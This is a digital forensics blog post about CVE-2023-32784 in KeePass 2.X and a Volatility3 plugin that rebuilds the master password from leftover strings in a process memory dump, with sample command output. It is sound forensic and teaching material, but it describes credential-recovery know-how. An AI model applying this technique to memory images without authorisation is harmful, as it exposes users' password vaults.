π¦ Volatility3 Windows Plugin - KeePass
On May 1st, 2023, vdhoney1 raised concerns about a flaw he found impacting KeePass 2.X.2. Vdhoney claimed to be able to reconstruct the master password from memory. A POC 3 was later released by the researcher not only in dotnet but also in python34.
Today in this blog post we will describe the vulnerability and see how we can create a volatility3 plugin to help forensics investigators to retrieve passwords from memory.
Vulnerability descriptionβ
The vulnerability (CVE-2023-32784 5) resides in the basic KeePass version 2.X written in .NET. This version utilizes its own custom-made text box named SecureTextBoxEx, not only for the master password entry dialog but also in other parts of the program such as password edit boxes. Though this use case is not likely to be used by users as it is a bad practice, it should be noted that the flaw does not cover the scenario where the master password was copied from a clipboard. From this observation, Vdohney built up a method to recover that scattered information from memory. Indeed, this text box produces left over strings when a password is entered. For example, when βHelloβ is typed, the following strings remain present in memory ββ’e, β’β’l, β’β’β’l, β’β’β’β’oβ. One can find more details about this vulnerability on vdhoneyβs github 3.
The KeePass volatility3 pluginβ
As a forensics investigator, you might have actual (or past) cases where KeePass 2.X process activities were retrieved. Using volatility3, it is possible to list the running processes using the βpslistβ or βpsscanβ plugin.
~/work/DFIR/Memory Analysis/MemoryImages/KeePassMachine Β» vol -f KeePassMachine.mem windows.pslist
Volatility 3 Framework 2.4.1
Progress: 100.00 PDB scanning finished
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output
4 0 System 0x9908d5a87040 136 - N/A False 2023-05-19 14:20:08.000000 N/A Disabled
108 4 Registry 0x9908d5af6080 4 - N/A False 2023-05-19 14:20:04.000000 N/A Disabled
412 4 smss.exe 0x9908dabd8040 2 - N/A False 2023-05-19 14:20:08.000000 N/A Disabled
532 516 csrss.exe 0x9908dac800c0 11 - 0 False 2023-05-19 14:20:32.000000 N/A Disabled
628 516 wininit.exe 0x9908db831080 3 - 0 False 2023-05-19 14:20:32.000000 N/A Disabled
648 620 csrss.exe 0x9908db847140 13 - 1 False 2023-05-19 14:20:32.000000 N/A Disabled
700 628 services.exe 0x9908db894080 7 - 0 False 2023-05-19 14:20:32.000000 N/A Disabled
740 620 winlogon.exe 0x9908db8a4080 3 - 1 False 2023-05-19 14:20:32.000000 N/A Disabled
796 628 lsass.exe 0x9908db8c8080 6 - 0 False 2023-05-19 14:20:32.000000 N/A Disabled
912 700 svchost.exe 0x9908db936240 13 - 0 False 2023-05-19 14:20:32.000000 N/A Disabled
1716 912 dllhost.exe 0x9908de764080 5 - 1 False 2023-05-19 14:23:07.000000 N/A Disabled
4888 700 SgrmBroker.exe 0x9908df512080 7 - 0 False 2023-05-19 14:23:08.000000 N/A Disabled
7820 912 WmiPrvSE.exe 0x9908da4f7080 4 - 0 False 2023-05-19 14:23:26.000000 N/A Disabled
4272 4528 FTK Imager.exe 0x9908da509080 12 - 1 False 2023-05-19 14:23:42.000000 N/A Disabled
4100 700 WUDFHost.exe 0x9908de9a3080 5 - 0 False 2023-05-19 14:23:43.000000 N/A Disabled
2868 912 ShellExperienc 0x9908dec2c080 9 - 1 False 2023-05-19 14:23:45.000000 N/A Disabled
7684 912 RuntimeBroker. 0x9908d7f0d2c0 3 - 1 False 2023-05-19 14:23:46.000000 N/A Disabled
752 4528 KeePass.exe 0x9908da51b300 4 - 1 False 2023-05-19 14:25:34.000000 N/A Disabled
6344 700 svchost.exe 0x9908dd88a080 5 - 0 False 2023-05-19 14:25:49.000000 N/A Disabled
In this example we can see that the KeePass process was running on the host machine. The PID retrieved is β752β. Using volatility3, one can dump this process layer and retrieve all the sections linked to the virtual address spaces. Once completed, one can map virtual pages to physical pages and extract the residing data.
A custom plugin allows to parse the data to isolate the relevant patterns (in this case βββ) seeking to further attempt the reconstruction of the master KeePass password entered by a user. The plugin can be found here: https://github.com/forensicxlab/volatility3_plugins/blob/main/keepass.py
By passing the PID of the process to the volatility3 KeePass plugin, one can try to reconstruct the master password:
~/work/DFIR/Memory Analysis/MemoryImages/KeePassMachine Β» vol -f KeePassMachine.mem windows.keepass --pid 752 k1nd0ne@MacBook-Pro-de-Felix
Volatility 3 Framework 2.4.1
Progress: 100.00 PDB scanning finished
Offset Size Constructed_Password
0x3ba6000 0x1000 u
0x3ba7000 0x1000 up
0x3ba7000 0x1000 upe
0x3ba8000 0x1000 uper
0x3ba9000 0x1000 uperM
0x3ba9000 0x1000 uperMa
0x3baa000 0x1000 uperMa
0x3baa000 0x1000 uperMas
0x3bab000 0x1000 uperMast
0x3bab000 0x1000 uperMaste
0x3bac000 0x1000 uperMaste
0x3bac000 0x1000 uperMaster
0x3bad000 0x7000 uperMasterP
0x3bad000 0x7000 uperMasterPa
0x3bad000 0x7000 uperMasterPas
0x3bad000 0x7000 uperMasterPass
0x3bad000 0x7000 uperMasterPassw
0x3bad000 0x7000 uperMasterPasswo
0x3bad000 0x7000 uperMasterPasswor
0x3bad000 0x7000 uperMasterPassword
0x7ffbf8ac5000 0x1000 uperMasterPassword
0x96e545bd2000 0x1000 {u,,}perMasterPassword
0xc58000400000 0x200000 {u,&,o}perMasterPassword
0xf80564600000 0x1200000 {u,&,,,J}perMasterPassword
0xf805737d3000 0x1f000 {u,&,,,o, }perMasterPassword
Even if the first character of the password is not store in memory, the latter can be however easily brute forced.
Conclusionβ
To conclude this article, we demonstrated that the reconstruction of a master password of Keepass can be implemented into volatility3 framework via a custom plugin. The discovery of new memory extraction techniques is helping the field of digital forensics and specially law enforcement agencies that are now able to access memory from devices in a more efficient and non-destructive way. This methodology could be valuable in solving actual incident cases, including past ones where the memory was retrieved and stored and keepass master password remained unbroke.
This plugin was tested on a Win10 22H2 memory image. Do not hesitate to reach me at felix.guyard@forensicxlab.com to enhance this article.